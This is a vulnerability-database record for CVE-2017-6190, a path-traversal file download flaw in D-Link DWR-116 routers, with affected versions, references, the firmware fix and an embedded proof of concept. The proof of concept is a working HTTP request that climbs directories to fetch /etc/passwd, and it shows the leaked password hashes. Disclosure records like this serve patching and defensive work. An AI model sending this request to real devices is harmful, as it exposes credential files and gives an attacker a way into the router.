ID
VAR-E-201704-0087
CVE
cve_id: | CVE-2017-6190 | Trust: 2.3 |
cve_id: | CVE-2018-10822 | Trust: 0.5 |
cve_id: | CVE-2018-10823 | Trust: 0.5 |
cve_id: | CVE-2018-10824 | Trust: 0.5 |
EDB ID
41840
TITLE
D-Link DWR-116 / DWR-116A1 - Arbitrary File Download - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DWR-116 / DWR-116A1 - Arbitrary File Download. CVE-2017-6190 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | d link | model: | dwr-116 dwr-116a1 | scope: | eq | version: | / | Trust: 1.6 |
vendor: | d link | model: | dwr-116 | scope: | - | version: | - | Trust: 0.5 |
vendor: | d link | model: | plain-text password storage | scope: | - | version: | - | Trust: 0.5 |
vendor: | d link | model: | dwr-116 1.05 | scope: | - | version: | - | Trust: 0.3 |
vendor: | d link | model: | dwr-116 1.01 | scope: | - | version: | - | Trust: 0.3 |
vendor: | d link | model: | dwr-116 1.00 b10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | d link | model: | dwr-116 1.05b09 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
which leads to unathorized file download from device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Arbitrary File Download
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.0 |
tag: | file inclusion | Trust: 1.0 |
tag: | arbitrary | Trust: 0.5 |
tag: | vulnerability | Trust: 0.5 |
tag: | code execution | Trust: 0.5 |
CREDITS
Patryk Bogdan
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2017-6190 | Trust: 2.3 |
db: | EXPLOIT-DB | id: | 41840 | Trust: 1.6 |
db: | EDBNET | id: | 92542 | Trust: 0.6 |
db: | PACKETSTORM | id: | 142052 | Trust: 0.5 |
db: | NVD | id: | CVE-2018-10824 | Trust: 0.5 |
db: | NVD | id: | CVE-2018-10822 | Trust: 0.5 |
db: | NVD | id: | CVE-2018-10823 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149844 | Trust: 0.5 |
db: | BID | id: | 97620 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2017-6190 | Trust: 2.0 |
url: | https://www.exploit-db.com/exploits/41840/ | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-10822 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-10824 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-10823 | Trust: 0.5 |
url: | http://seclists.org/bugtraq/2017/apr/28 | Trust: 0.3 |
url: | http://www.d-link.com | Trust: 0.3 |
SOURCES
db: | BID | id: | 97620 |
db: | PACKETSTORM | id: | 142052 |
db: | PACKETSTORM | id: | 149844 |
db: | EXPLOIT-DB | id: | 41840 |
db: | EDBNET | id: | 92542 |
LAST UPDATE DATE
2022-07-27T09:11:31.130000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 97620 | date: | 2017-04-18T00:06:00 |
SOURCES RELEASE DATE
db: | BID | id: | 97620 | date: | 2017-04-07T00:00:00 |
db: | PACKETSTORM | id: | 142052 | date: | 2017-04-07T19:22:22 |
db: | PACKETSTORM | id: | 149844 | date: | 2018-10-18T03:47:09 |
db: | EXPLOIT-DB | id: | 41840 | date: | 2017-04-07T00:00:00 |
db: | EDBNET | id: | 92542 | date: | 2017-04-12T00:00:00 |